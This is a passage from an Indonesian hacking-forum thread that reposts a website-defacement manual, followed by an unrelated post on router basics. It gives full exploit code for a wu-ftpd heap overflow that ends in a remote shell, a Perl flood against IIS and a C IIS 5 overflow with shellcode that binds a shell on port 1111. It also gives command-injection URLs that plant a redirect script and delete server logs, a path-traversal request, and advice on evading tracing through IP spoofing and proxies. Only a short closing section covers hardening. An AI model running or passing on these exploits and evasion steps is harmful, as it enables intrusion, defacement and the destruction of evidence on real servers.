buf2.setCharAt(l+1,(char)Integer.parseInt(“FF”, 16));
buf2.setCharAt(l+2,(char)Integer.parseInt(“FF”, 16));
buf2.setCharAt(l+3,(char)Integer.parseInt(“FF”, 16));

buf2.setCharAt(l+4,(char)Integer.parseInt(“F0″, 16));
buf2.setCharAt(l+5,(char)Integer.parseInt(“FF”, 16));
buf2.setCharAt(l+6,(char)Integer.parseInt(“FF”, 16));
buf2.setCharAt(l+7,(char)Integer.parseInt(“FF”, 16));

buf2.setCharAt(l+8,(char)Integer.parseInt(got[3], 16));
buf2.setCharAt(l+9,(char)Integer.parseInt(got[2], 16));
buf2.setCharAt(l+10,(char)Integer.parseInt(got[1], 16));
buf2.setCharAt(l+11,(char)Integer.parseInt(got[0], 16));

buf2.setCharAt(l+12,(char)Integer.parseInt(inpbuf[3], 16));
buf2.setCharAt(l+13,(char)Integer.parseInt(inpbuf[2], 16));
buf2.setCharAt(l+14,(char)Integer.parseInt(inpbuf[1], 16));
buf2.setCharAt(l+15,(char)Integer.parseInt(inpbuf[0], 16));

}

buf.append(“user ftp\npass http://mp3.com/cosv “);
buf.append((char)Integer.parseInt(heap[3], 16)+”"+(char)Integer.parseInt(heap[2], 16)+”"+(char)Integer.parseInt(heap[1], 16)+”"+(char)Integer.parseInt(heap[0], 16));
buf.append(“\n”);

connect(victim);

dosend(buf.toString());

StringBuffer snd=new StringBuffer(“site exec “+buf2+” AAAA\n”);
dosend(snd.toString());

buf2=new StringBuffer(“”);

file://fill buffer with nops
for(int i=0;i!=480-sclength-1;i++)
buf2.append((char)0×90);

file://add chunks xebx18
for(int l=2;l-1)
return true;

}
}
catch(IOException e){}

}

}//if(s!=null)

if(s!=null && !mode.equals(”real”))
{
try
{
s.close();s=null;sin=null;sout=null;
}
catch(IOException e){}
}

return false;
}//exploit

public static void main(String args[])
{
woot wu=new woot();
boolean brute=true;
reader = new Reader(wu);
writer = new Writer(wu);

try
{
if(args[0]!=null)
victim=args[0];
}
catch(ArrayIndexOutOfBoundsException a){}

System.out.println(”\n!! wu-ftpd 2.6.[0/1] remote heap overflow exploit”);
System.out.println(”!! original exploit code by zen-parse”);
System.out.println(”!! ported and modified by CraigTM [ElectronicSouls]“);

if(victim.equals(””))
wu.getTarget();

System.out.print(”\n## Checking server version & anonymous access”);

if(!wu.allowsAnonymous())
{
System.out.println(”failed: anonymous access denied!”);
System.exit(-1);
}
else
System.out.println(”ok”);

try
{
if(args[1]!=null)
{
tmp_heap=Long.parseLong(args[1],16);
System.out.println(”++ Option #”+m+” chosen.”);
m=(m-1)*4;
System.out.println(”++ Exploiting “+targets[m]+”\n”);

tmp_got=Long.parseLong(targets[m+1],16)-12;
tmp_inpbuf=Long.parseLong(targets[m+2],16)+20;

System.out.println(”got:\t”+Long.toHexString(tmp_g ot+12)+”\ninpbuf:\t”+Long.toHexString(tmp_inpbuf-20));
System.out.println(”heap:\t”+Long.toHexString(tmp_ heap)+”\n”);
System.out.println(”\nTrying to get shell…\n”);

wu.exploit(”real”);
wu.shell();

brute=false;
}
}
catch(ArrayIndexOutOfBoundsException a){}

if(brute)
{

if(wu.force())
{
wu.exploit(”real”);
wu.shell();
}

else
System.out.println(”\nSome value somewhere is bad. Could be in a skipped range.”);

}//brute force the heap

System.out.println();

}//main()

}//class
__________________
GhoStM@nZ-e.V.o
H N G UNIT
Reply With Quote
dede23
View Public Profile
Send a private message to dede23
Visit dede23’s homepage!
Find all posts by dede23
#3
Old 27-07-2006, 01:08 PM
dede23’s Avatar
dede23 dede23 is offline
IndoForum Junior B

No. Urut: 2268
Join Date: Jun 2006
Location: G-UNIT
Posts: 2,547
Rep Power: 3
dede23
Send a message via MSN to dede23 Send a message via Yahoo to dede23 Send a message via Skype™ to dede23
///////////////////////////////////////////////////////////////////////////////
//////////////////////////////SOCKET/READER////////////////////////////////////

class Reader extends Thread
{

woot W;

public Reader(woot w)
{
super(”shell Reader”);
this.W = w;
}

public void run()
{
try
{
String tmp;

while(true)
{
tmp=woot.sin.readLine();

if(tmp==null)
System.exit(1);

System.out.println(tmp);
}

}
catch (IOException e){}
}

}//class Reader

//////////////////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////SOCKET/WRITER////////////////////////////////////////

class Writer extends Thread
{

woot W;

public Writer(woot w)
{
super(”shell Writer”);
this.W = w;
}

public void run()
{

try
{
DataInputStream in = new DataInputStream (System.in);
String tmp;

while(true)
{
tmp=in.readLine();
woot.sout.println(tmp);
}

}
catch (IOException e){}
}

}//class Writer

————————————————————————

4.
# Written by Ivan Hernandez over code of Georgi Guninski
use IO::Socket;

print “IIS 5.0 Bogus Content-Length\n”;

$port = @ARGV[1];
$host = @ARGV[0];

$req=”GET /ampgn HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic ” . “A” x 50000 . “\r\n\r\n”;

$i=0;
while (1) {
$socket[$i] = IO::Socket::INET->new(PeerAddr =>
$host,PeerPort => $port,Proto => “TCP”);
syswrite($socket[$i],$req,length($req));
print “.”;
$i++;

}

$i=0;

print “\nDone.”;

————————————————————————

Catatan: Huh! Jangan berpikir bahwa jika anda bisa melakukan hack terus menerus dengan kode yang tersedia diatas. Maaf!! exploit ini sudah kadaluarsa! sudah tidak berfungsi lagi…? sebenarnya code ini diberikan hanya untuk memberikan anda awalan perihal coding exploit. Hacking tidak dapat dilakukan secara instant. Jika anda memikirkan bahwa anda bisa sekedar surfing sepanjang hari mencari exploit dan malam harinya anda melakukan hack website, pikirkan lagi.. anda membutuhkan code exploit anda sendiri atau memodifikasi exploit sesuai keperluan hacking anda.

MENGEKSPLOITASI VULNERABILITY YANG ADA
UNTUK MENYUSUP KEDALAM SERVER
Diatas telah saya sajikan beberapa code exploit yang ditulis dalam bahasa seperti Perl, Java dan C. Ada code exploit yang ditulis sehubungan dengan vulnerability yang ditemukan pada kebanyakan web server dan software maintenance website yang telah dipatch terhadap vulnerability tersebut. Jadi anda tidak dapat menembus web server target dengan code ini. Tetaplah mengupdate pengetahuan mengenai vulnerability terakhir dengan mengunjungi situs yang saya sebutkan diatas. Tapi apa yang harus anda lakukan adalah menulis code exploit anda sendiri.

Umumnya, sejauh yang saya pertimbangkan code exploit tersedia di internet yang terkait dengan vulnerabily telah dipatch.. singkatnya.. sudah kadaluarsa. Jadi anda harus mengulis code exploit anda sendiri dengan tujuan untuk menyusup ke website berkualitas tinggi.

Katakanlah, beberapa hari yang lalu sebuah Dos Vulnerability telah ditemukanapada server Apache yang menjalankan PHP. Menurut vulnerabiltiy tersebut jika php module dipanggil tanpa parameter yang benar maka php modul tidak akan berhenti.Akibatnya dengan meningkatnya jumlah php module yang terus menerus menjadikan konsumsi sumber daya memory sistem menjadi besar.

OK, ini adalah konsep. Sekarang anda harus menulis code exploit untuk hal ini. Anda dapat memeriksa internet untuk mencari exploit yang ada dan mungkin anda bisa mendapatkan suatu exploit yang ditulis dalam bahasa C. Sekarangjika anda tidak memiliki latar belakang pemrograman apapun maka anda tidak akan mampu mengompilasi code tersebut dan membentuk file executable karena code exploit yang tersedia di internet memerlukan modifikasi dan seluruh kompilasi diatas dari code C terkadang bervariasi dari satu compiler dengan compiler lainnya. Namun jika anda memiliki latar belakang pemrograman maka anda dapat membuat program Multithread sederhanda lainnya dalam bahasa C atau Java (entah dengan perl). Seluruh yang harus anda lakukan adalah sejumlah besar dari setiap jalur yang mengirimkan suatu request ke php module pada web server dengan incorrect parameter. Dan itu dia.. jika web server tersebut benar-benar vulnerable anda dapat membuat serangan DoS (Denial of Service). Seluruh yang saya ingin jelaskan dalam paragraf ini adalah cara mendeface website, anda perlu latar belakang pemrograman yagn bagus.

INJEKSI MALICIOUS CODE MELALUI URL

Apakah Cross Site Scripting itu?

Pada dasarnya cross site scripting adalah metode eksekusi atau argumen kewenangan sistem terhadap web server dengan mengeksploitasi vulnerabiltiy melalui URL. Bug Cross Site Scripting memungkinkan anda mengeksekusi perintah shell, menginjeksi perintah kedalam file sistem (terutama menggunakan ECHO pada shell dan meneruskan outputnya), dan bahkan membuat atua menghapus file pada sistem melalui shell tersebut mengingat bahwa status sitem yagn ada memiliki cukup execution privilege.

Ini merupakan metode yang dikenal secara luas dari mendeface suatu website. Sesuai dengan metode ini, seorang attaceker menemukan beberapa cross site scripting vulnerabiltiy pada software web server tersebut dan berusaha mengeksekusi script atau perintah sistem lainnya pada sistem yang dijalankan oleh web server target.

Jika attacker tersebut menemukan beberapa cross site scripting vulnerabiltiy maka dia akan mencoba memasukkan beberapa pengarahan malicious code ke dalam file index.html jika website tersebut bukan berbasiskan database yang akan mengakibatkan pengarahan website setiap kali halaman index.html diload. Kita dapat menginjeksi malicious code menggunakan test-cgi.bt\at vulnerabiltiy yang ada pada Apache 2.0.x (Win32) (versi terdahulu juga berisikan file test-cgi.bat). Serangan url ini akan terlihat seperti :

http://www.target.com/cgi-bin/test-cgi.bat?|echo++window.open(‘http://hackersclub.up.to’)++>>/htdocs/index.html

Sekarang jika serangan tersebut berhasil maka script tersebut akan tercipta dalam file statis index.html dan saat file ini meload sebuah window pop up akan meload websiteku.

Bug lainnya yang terkenal dietmukana dalam versi Apache 2.0.x perlu disebutkan karena menyebabkan eksploitasi yang kita lakukan menampilkan banyak hal, termasuk pula Deteksi Remote Operating System, menginjeksi malicious code, mendeface website, menyusup ke sistem dan mengambil root privilege. Versi terakhir dari Apache web server berisikan direktori virtual yang disebut Error dalam server root. Direktori ini berisikan file HTML yang berhubungan dengan pesan error yagn lain. Sekarang jika kita melakukan request terhadap suatu file dalam direktori ini dengan ekstensi .var maka server tersebut akan merombak lokasinya.

Sekarang jika kita melakukan request terhadap file menggunakan URL ini:

http://www.target.com/error/HTTP_NOT_FOUND.html.var

Maka web server tersebut merespoonnya dengan output sebagai berikut:

Not Acceptable
|
|An appropriate representation of the requested resource /error/HTTP_NOT_FOUND.html.var could
not be found on this server.
|Available variants:
|
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language
de
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language
en
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language
es
| * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language
fr

Saat ini dengan melihat jalur instalasi software server, kita dapat menemukan banyak informasi megnenai target kita. Pertama kali kita dapat mengatakan bahwa target tersebut adalah Sistem Operasi Window sebagaimana halnya dengan sistem *nix tidak memiliki c:\ benar khan??

Versi Apache ini mengijinkan kita melakukan Cross Site Scripting… kita dapat mengeksekusi kewenangan perintah sistem melalui direktori cgi-bin atau direktori error tersebut. Perhatikan URL berikut ini:

http://127.0.0.1/error/%5c%2e%2e%5c%…innt%5cwin.ini

url yang diberikan berupa Hex Encode URL yang merequest terhadap file win.ini terhada read access pada direktori winnt.

catatan : %5c = ‘\’ (back slash)
%2e = ‘.’ (dot) ( Form Normal dari URL diatas adalah :

http://127.0.0.1/error/\..\..\..\..\winnt\win.ini

URL cross site scripting lainnya bahwa kita dapat membuatnya:

http://127.0.0.1/cgi-bin/%5c%2e%2e%5…exe?%2dt+HELLO

Dalam kasus ini kita menggunakan utility wintty.exe yang terletak dalam direktori /bin dari instalasi Apache. Selanjutnya sebagaimana yang telahsaya sebutkan sebelumnya kapunpun kita memanggil suatu file .exe atau .bat (shell hasil eksekusi) maka sebuah shell akan dibuat untuk proses eksekusi dan seperti kasus kewenangan perintah sistem menggunakan operator | (karakter pipe)

AMANKAN DIRI ANDA SENDIRI
Jika anda memiliki pengetahuan mengenai web server populer seperti IIS, Apache dsb.. maka saya yakin bahwa anda harus melewati file log yang merekam dan setiap request dibuat ke server. Selanjutnya setiap request yagn direkam sepanjang penggunaan IP sumber, maka bukan masalah yang ebsar bagi seorang administrator sistem untuk melacak malicious cracker melalui IP yang tertinggal pada lognya.

Jadi sangatlah penting untuk mengamankan diri anda sendiri, bila tidak anda dalam kesulitan besar… jadi pada dasarnya anda harus melakukan pembersihan file log setelah menyusup edalam suatuweb server atau menggunakan cross site scripting untuk menghapus file log ini… sebelum anda berusaha menjalankan suatu program remote exploit terhadap target anda, anda perlu menyembunyikan identitas anda, yakni IP.. IP anda adalah masalah besar yang harus anda hadapi. JIka anda memiliki sedikit pengetahuan mengenai Networking maka tentulah anda tahu apa saja yang dapat dilakukan dengan suatu IP… untuk mengetahui lebih lanjut mengenai pelacakan IP bacalah manual saya yang berjudul Tracing IP pada http://www.hackersclub.up.to.

Sebenarnya file log dibuat pada beberapa direktori standar.. sebagai contoh dalam instalasi default Apache, file log ini berada dalam C:\Apache Group\Apache\logs [saya mengujinya pada Apache 1.3.x] tetap ada suatu access log dan error log yang merekam even yang terkait. Saat sebuah pesan 200 OK ditampilkan oleh server pada respon ke beberapa request maka even tersebut terekam kedalam file access log dan pesan error seperti 404 File Not Found, 403 Forbiddent dan pesan error lainnya tersimpand alam file error log tersebut…

Hiding IP: pada dasarnya sat anda mengirimkan packet data ke suatu server IP asli anda akan direkam. Tapi jika anda menggunakan sistem operasi yang memperbolehkan penggunaan RAW SOCKET maka anda dapat mengirim paket data yang dibuat sendiri ke server dengan didahului IP asli anda..

Saat ini banyak yang harus anda tanyakan apakah RAW SOCKETS itu. OK, raw socket kurang lebih sama dengan socket biasa tapi memungkinkan kendali lebih atas packet data ke Socket Programmer. Dalam sistem WIn9x yang memiliki socket normal IP dan port asli dan informasi lainnya termasuk dalam packet data oleh kernel Sistem operasi. Tapi dalam sistem raw socket (dikenal juga sebagai Berkley Socket setelah sesuai dengan nama developer raw socket yagn merupakan karakteristik fitur sistem *nix namun diimplemetasikan oleh Microsoft dalam Windows XP.. entah apakah Win 2000 mendukung raw socket atau tidak ya?) memungkinkan socket programmer menyisipkan IP dan Port sumber buatan sendiri ke dalam sebuah packet data.

Oleh karena itu jika anda menggunakan sistem *nix atau sistem Windows XP maka anda dapat berbuat sesuka hati. Jika anda memiliki keterampilan pemrograman maka anda bisa mendapatkan code program yang dapat mengirimkan utilisasi packet datas yagn dibuat sendiri pada raw socket. Dalam kasus ini packet data yagn akan anda kirimkan akan di log dengan IP palsu pada file log server.

Metode lainnya agar anda aman adalah membersihkan file log. Apa yang dapat anda lakukanadalah menggunakan cross site scripting vulnerability untuk menghapus file log. Sesuatu seperti:

http://www.target.com/cgi-bin/test-cgi.bat?|/DEL+..\log\*.* (pada Apache melalui test-cgi vulnerability)

Dalam kasus IIS pada Windows 2000 anda bisa menggunakan metode berikut untuk mendapatkan DOS Shell melalui telnet.

Code berikut ini mengeksploitasi suatu buffer overflow IIS 5 pada Win 2000 server dan membuka port 1111 dan menciptakan suatu shell. JIka exploit tersebut ebrhasil maka seluruh yang harus anda lakukan adalah menggunakan telnet untuk terhubung ke port 1111 dari target dan anda telah menguasai sistem tersebut.

Kompilasi dan jalankan code exploit berikut ini:

/* Windows 2000 Server Exploit By CHINANSL Security Team.
Test on Windows 2000 Chinese Version, IIS 5.0 , not patched.
Warning:THIS PROGRAM WILL ONLY TEST.
CHINANSL Technology CO.,LTD http://www.chinansl.com
keji@chinansl.com
*/

#include “stdafx.h”
#include
#include
#include
#include
#pragma comment (lib,”Ws2_32″)

int main(int argc, char* argv[])
{
if(argc != 4)
{
printf(”%s ip port aspfilepath\n\n”,argv[0]);
printf(” ie. %s 127.0.0.1 80 /iisstart.asp\n”,argv[0]);
puts(” programed by keji@chinansl.com”);

return 0;
}

DWORD srcdata=0×01e2fb1c-4;//0×00457474;
file://address of SHELLCODE
DWORD jmpaddr=0×00457494; file://0×77ebf094;/ /0×01e6fcec; file://”\x1c\xfb\xe6\x01″; file://”\x0c\xfb\xe6\x01″;

char* destIP=argv[1];
char* destFile=argv[3];
int webport=atoi(argv[2]);
char* pad=”\xcc\xcc\xcc\xcc” “ADPA” “\x02\x02\x02\x02″ “PADP”; file://16 bytes

WSADATA ws;
SOCKET s;
long result=0;
if(WSAStartup(0×0101,&ws) != 0)
{
puts(”WSAStartup() error”);
return -1;
}

struct sockaddr_in addr;
addr.sin_family=AF_INET;
addr.sin_port=htons(webport);
addr.sin_addr.s_addr=inet_addr(destIP);
s=socket(AF_INET,SOCK_STREAM,0);
if(s==-1)
{
puts(”Socket create error”);
return -1;
}

if(connect(s,(struct sockaddr *)&addr,sizeof(addr)) == -1)
{
puts(”Cannot connect to the specified host”);
return -1;
}

char buff[4096];
char* shellcode=”\x55\x8b\xec\x33\xc0\xb0\xf0\xf7\xd8\x0 3\xe0\x8b\xfc\x33\xc9\x89″
“\x8d\x2c\xff\xff\xff\xb8\x6b\x65\x72\x6e\xab\xb8\ x65\x6c\x33\x32″
“\xab\x32\xc0\xaa\xb8\x77\x73\x6f\x63\xab\xb8\x6b\ x33\x32\x2e\xab”
“\x4f\x32\xc0\xaa\x8d\x7d\x80\xb8\x63\x6d\x64\x2e\ xab\x32\xc0\x4f”
“\xaa\xb8\x23\x80\xe7\x77\x8d\x9d\x10\xff\xff\xff\ x53\xff\xd0\x89″
“\x45\xfc\xb8\x23\x80\xe7\x77\x8d\x9d\x19\xff\xff\ xff\x53\xff\xd0″
“\x89\x45\xf8\xbb\x4b\x56\xe7\x77\x6a\x47\xff\x75\ xfc\xff\xd3\x89″
“\x45\xf4\x6a\x48\xff\x75\xfc\xff\xd3\x89\x45\xf0\ x33\xf6\x66\xbe”
“\x1d\x02\x56\xff\x75\xfc\xff\xd3\x89\x45\xec\x66\ xbe\x3e\x02\x56″
“\xff\x75\xfc\xff\xd3\x89\x45\xe8\x66\xbe\x0f\x03\ x56\xff\x75\xfc”
“\xff\xd3\x89\x45\xe4\x66\xbe\x9d\x01\x56\xff\x75\ xfc\xff\xd3\x89″
“\x85\x34\xff\xff\xff\x66\xbe\xc4\x02\x56\xff\x75\ xfc\xff\xd3\x89″
“\x85\x28\xff\xff\xff\x33\xc0\xb0\x8d\x50\xff\x75\ xfc\xff\xd3\x89″
“\x85\x18\xff\xff\xff\x6a\x73\xff\x75\xf8\xff\xd3\ x89\x45\xe0\x6a”
“\x17\xff\x75\xf8\xff\xd3\x89\x45\xdc\x6a\x02\xff\ x75\xf8\xff\xd3″
“\x89\x45\xd8\x33\xc0\xb0\x0e\x48\x50\xff\x75\xf8\ xff\xd3\x89\x45″
“\xd4\x6a\x01\xff\x75\xf8\xff\xd3\x89\x45\xd0\x6a\ x13\xff\x75\xf8″
“\xff\xd3\x89\x45\xcc\x6a\x10\xff\x75\xf8\xff\xd3\ x89\x45\xc8\x6a”
“\x03\xff\x75\xf8\xff\xd3\x89\x85\x1c\xff\xff\xff\ x8d\x7d\xa0\x32″
“\xe4\xb0\x02\x66\xab\x66\xb8\x04\x57\x66\xab\x33\ xc0\xab\xf7\xd0″
“\xab\xab\x8d\x7d\x8c\x33\xc0\xb0\x0e\xfe\xc8\xfe\ xc8\xab\x33\xc0″
“\xab\x40\xab\x8d\x45\xb0\x50\x33\xc0\x66\xb8\x01\ x01\x50\xff\x55″
“\xe0\x33\xc0\x50\x6a\x01\x6a\x02\xff\x55\xdc\x89\ x45\xc4\x6a\x10″
“\x8d\x45\xa0\x50\xff\x75\xc4\xff\x55\xd8\x6a\x01\ xff\x75\xc4\xff”
“\x55\xd4\x33\xc0\x50\x50\xff\x75\xc4\xff\x55\xd0\ x89\x45\xc0\x33″
“\xff\x57\x8d\x45\x8c\x50\x8d\x45\x98\x50\x8d\x45\ x9c\x50\xff\x55″
“\xf4\x33\xff\x57\x8d\x45\x8c\x50\x8d\x45\x90\x50\ x8d\x45\x94\x50″
“\xff\x55\xf4\xfc\x8d\xbd\x38\xff\xff\xff\x33\xc9\ xb1\x44\x32\xc0″
“\xf3\xaa\x8d\xbd\x38\xff\xff\xff\x33\xc0\x66\xb8\ x01\x01\x89\x47″
“\x2c\x8b\x45\x94\x89\x47\x38\x8b\x45\x98\x89\x47\ x40\x89\x47\x3c”
“\xb8\xf0\xff\xff\xff\x33\xdb\x03\xe0\x8b\xc4\x50\ x8d\x85\x38\xff”
“\xff\xff\x50\x53\x53\x53\x6a\x01\x53\x53\x8d\x4d\ x80\x51\x53\xff”
“\x55\xf0\x33\xc0\xb4\x04\x50\x6a\x40\xff\x95\x34\ xff\xff\xff\x89″
“\x85\x30\xff\xff\xff\x90\x33\xdb\x53\x8d\x85\x2c\ xff\xff\xff\x50″
“\x53\x53\x53\xff\x75\x9c\xff\x55\xec\x8b\x85\x2c\ xff\xff\xff\x85″
“\xc0\x74\x49\x33\xdb\x53\xb7\x04\x8d\x85\x2c\xff\ xff\xff\x50\x53″
“\xff\xb5\x30\xff\xff\xff\xff\x75\x9c\xff\x55\xe8\ x85\xc0\x74\x6d”
“\x33\xc0\x50\xff\xb5\x2c\xff\xff\xff\xff\xb5\x30\ xff\xff\xff\xff”
“\x75\xc0\xff\x55\xcc\x83\xf8\xff\x74\x53\xeb\x10\ x90\x90\x90\x90″
“\x90\x90\x6a\x32\xff\x95\x28\xff\xff\xff\xeb\x99\ x90\x90\x33\xc0″
“\x50\xb4\x04\x50\xff\xb5\x30\xff\xff\xff\xff\x75\ xc0\xff\x55\xc8″
“\x83\xf8\xff\x74\x28\x89\x85\x2c\xff\xff\xff\x33\ xc0\x50\x8d\x85″
“\x2c\xff\xff\xff\x50\xff\xb5\x2c\xff\xff\xff\xff\ xb5\x30\xff\xff”
“\xff\xff\x75\x90\xff\x55\xe4\x85\xc0\x74\x02\xeb\ xb4\xff\x75\xc4″
“\xff\x95\x1c\xff\xff\xff\xff\x75\xc0\xff\x95\x1c\ xff\xff\xff\x6a”
“\xff\xff\x95\x18\xff\xff\xff”;

char* s1=”POST “;// HTTP/1.1\r\n”;
char* s2=”Accept: */*\r\n”;
char* s4=”Content-Type: application/x-www-
form-urlencoded\r\n”;
char* s5=”Transfer-Encoding:
chunked\r\n\r\n”;
char* sc=”0\r\n\r\n\r\n”;

char shellcodebuff[1024*8];
memset(shellcodebuff,0×90,sizeof
(shellcodebuff));
memcpy(&shellcodebuff[sizeof(shellcodebuff)-
strlen(shellcode)-1],shellcode,strlen(shellcode));
shellcodebuff[sizeof(shellcodebuff)-1] = 0;

char sendbuff[1024*16];
memset(sendbuff,0,1024*16);

sprintf(sendbuff,”%s%s?%s HTTP/1.1\r\n%sHost: %s\r\n%s%s10\r\n%s\r\n4\r\nAAAA\r\n4\r\nBBBB\r\n%s “, s1, destFile, shellcodebuff, s2, destIP, s4,s 5, pad/*,srcdata,jmpaddr*/, sc);

int sendlen=strlen(sendbuff);
*(DWORD *)strstr(sendbuff,”BBBB”) = jmpaddr;
*(DWORD *)strstr(sendbuff,”AAAA”) = srcdata;

result=send(s,sendbuff,sendlen,0);
if(result == -1 )
{
puts(”Send shellcode error!”);
return -1;
}

memset(buff,0,4096);
result=recv(s,buff,sizeof(buff),0);

if(strstr(buff,””) != NULL)
{
shutdown(s,0);
closesocket(s);

puts(”Send shellcode error!Try again!”);
return -1;
}

shutdown(s,0);
closesocket(s);
printf(”\nUse to connect to the host\n”,destIP);
puts(”If you cannot connect to the host,try run this program again!”);

return 0;
}

note : penjelasan dari code C ini diluar batasan dari manual ini

Apa yang code ini lakukan adalah menyebabkan overflow pada IIS Win200 dan memaksa sistem membuat shell ke IP sumber pada port 1111. sekarang jika exploit ini bekerja dengan sesuai akan ada sebuah shell pda port 1111 pada sistem target. Apa yang harus anda lakukan adalah menggunakan perintah “telnet IPtarget 1111″ pada console untuk mendapatkan koneksi ke sistem tanpa otentikasi apapun.

Seringkali metode mengamankan diri sendiri dengan menggunakan banyak wingate atau proxy. Sebelum melakukan perintah pada sistem target anda perlu melakukannya melalui proxi atau wingate jadi IP yagn dilog pada file log server berupa Ip dari sistem proxy atau wingate tersebut, bukan IP anda. Dalam kasus ini akan sukar untuk mendeteksi anda, tapi tidak mustahil tentunya.

CATATAN AKHIR DAN TINDAKAN KEAMANAN
Pendeface-an website telah menjadi masalah nyata pada berbagai perusahaan dan situs-situs pemerintah saat ini semenjak website pemerintah terdeface sebagai dampak perang cyber dan alasan lain yang tidak disebutkan disini. Kebanyakan website pendeface-an website dan analisa yang saya lihat pada situs seperti http://defaced.alldas.org menunjukkan bahwa mereka telah di crack dan bukan di hack!! dampak pada kesalahan konfigurasi dan kelalaian tanggung jawab Administrator system dan anggota lainnya dari kelompok yang terkait dengan masalah keamanan website. Saya akan menyarankan system administrator untuk mengikuti petunjuk perlindungan website mereka.

Pertama kali sebagaimanayang telah saya jelaskan sebelumnya dalam amnual mereka mengenai permisi direktori dan bagaimana cara mereka tereksploitasi, selalu merupakkan sebuah ide yang bagus untuk mengorganisasi webroot anda dengan direktori yang sesuai. Maksud saya direktori untuk images, HTML, dan content statis lainnya. Permisi dari direktori harsu dilakukan secara minimum tanpa scripting atau execution permission sebagaimana halnya HTML dan images statis lainnya yang tidak memerlukan permisi. Malkonfigurasi dalam point ini tampilan ini seringkali membuat seorang attacker dengan mudahnya menyisipkan malicious code dalam file index.html yang dihasilkan dalam pengarahan website.

Secara teratur (kalau bisa setiap hari) kunjungi website dari web server perusahaan anda dan bacalah mengenai vulnerability dan solusi dari vulnerability tersebut. Seharusnya terbetik pada pikiran anda bahwa seluruh software dapat dieksploitasi (pendapat saya dapat dipertimbangkan) jadi jika web server anda vulnerable yang tidak dimaksudkan bahwa anda harus mengubah web server anda.

Download dan install patch yang sesuai dan tersedia dari official site web server anda dan secara teratur melakukan patch web server dan sistem operasi anda untuk mengetahui celah keamanannya. Kunjungi website seperti http://securityfocus.com untuk menjaga diri anda agar mengetahui vulnerability terakhir dan solusi yang berhubungan dengan hal tersebut.

Periksa sistem anda pada celah keamanan yang terbuka. Port scan sistem anda secara teratur dan periksa port yang terbuka. Juga periksa vulnerability yang terkait dengan port tersebut dan install patch yang sesuai. Cobalah melakukan hosting website melalui sebuah proxy. Gunakan halaman berbasiskan database dengan tujuan mengamankan halaman anad (terutama index.html) dari penyisipan malicious script. Malicious script dapat di sisipkan dengan banyak cara. Tidak hanya melalui URL tapi juga dapat disisipkan melalui telnet.

Terakhir, saya ingin mengatakan satu hal yang merupakan pandangan menyeluruh saya. Saya kira sebuah website tidak 100% aman hanya dengan membaca buku dan mendapatkan pelatihan profesional. Terkecuali bila anda mengetahui metode para cracker dan hacker yang anda tidak mampu melindungi website anda. Anda perlu mengetahui bagaima cara cracker berpikir sebelum mulai menyusup ke dalam sistem. Anda dapat dengan mudah melindungis sistem anda dariscript kiddies yang hanyamelakukan scan sistem terhadap celah keamanan yang ada. Namun melindung sistem anda dari hacker atau cracker yang hanya satu orang dan hanya satu target hingga berhasil adalah sangat sukar. Hingga anda mengetahui bagaimana mereka berpikir dan apa yang menjadi pendekatan atau metode mereka, sangat sukra untuk memproteksi website anda dari orang-orang seperti ini.

Jika anda menggunakan Linux atau varian *nix lainnya, tidak berarti bahwa sistem anda aman secara keseluruhan. Linux dianggap lebih aman karena windows selalu menjadi target serangan para hacker! setidaknya untuk beberapa tahun. (Menurut saya) keamanan website anda tidak tergantung hanya sistem operasi yang dijalankan. Tergantung konfigurasi dan manajemen inteligensi dari sistem adna tersebut.

Jalankan service minimum sebagai kebutuhan. Cobalah menutup layanan yant tidak diperlukan. JIka sistem anda menggunakan atau memberikan share pada internal network maka gunakan hardware/packet level firewall.

Oki doki, sampai disini saja manual saya.

Komentar dan saran diterima via email abhisek@gamebox.net

Abhisek Datta

http://www.abhisekdatta.up.to

http://www.hackersclub.up.to

abhisek@gamebox.net

JOIN HC by sending a blank mail to members_hackersclub@yahoogroups.com
__________________
GhoStM@nZ-e.V.o
H N G UNIT

Mengapa perlu router

Sebelum kita pelajari lebih jauh mengenai bagaimana mengkonfigurasi router cisco, kita perlu memahami lebih baik lagi mengenai beberapa aturan dasar routing. Juga tentunya kita harus memahami sistem penomoran IP,subnetting,netmasking dan saudara-saudaranya. Contoh kasus:

Host X à 128.1.1.1 (ip Kelas B network id 128.1.x.x)

Host Y à 128.1.1.7 (IP kelas B network id 128.1.x.x)

Host Z à 128.2.2.1 (IP kelas B network id 128.2.x.x)

Pada kasus di atas, host X dan host Y dapat berkomunikasi langsung tetapi baik host X maupun Y tidak dapat berkomunikasi dengan host Z, karena mereka memiliki network Id yang berbeda. Bagaimana supaya Z dapat berkomunikasi dengan X dan Y ? gunakan router !

Contoh kasus menggunakan subnetting

Host P à 128.1.208.1 subnet mask 255.255.240.0

Host Q à 128.1.208.2 subnet mask 255.255.240.0

Host R à 128.1.80.3 subnet mask 255.255.240.0

Nah, ketika subnetting dipergunakan, maka dua host yang terhubung ke segmen jaringan yang sama dapat berkomunikasi hanya jika baik network id maupun subnetid-nya sesuai.Pada kasus di atas, P dan Q dapat berkomunikasi dengan langsung, R memiliki network id yang sama dengan P dan Q tetapi memiliki subnetidyang berbeda. Dengan demikian R tidak dapat berkomunikasi secara langsung dengan P dan Q. Bagaimana supaya R dapat berkomunikasi dengan P dan Q ? gunakan router !

Jadi fungsi router, secara mudah dapat dikatakan, menghubungkan dua buah jaringan yang berbeda, tepatnya mengarahkan rute yang terbaik untuk mencapai network yang diharapkan

Dalam implementasinya, router sering dipakai untuk menghubungkan jaringan antar lembaga atau perusahaan yang masing-masing telah memiliki jaringan dengan network id yang berbeda. Contoh lainnya yang saat ini populer adalah ketika perusahaan anda akan terhubung ke internet. Maka router akan berfungsi mengalirkan paket data dari perusahaan anda ke lembaga lain melalui internet, sudah barang tentu nomor jaringan anda akan bereda dengan perushaaan yang anda tuju.

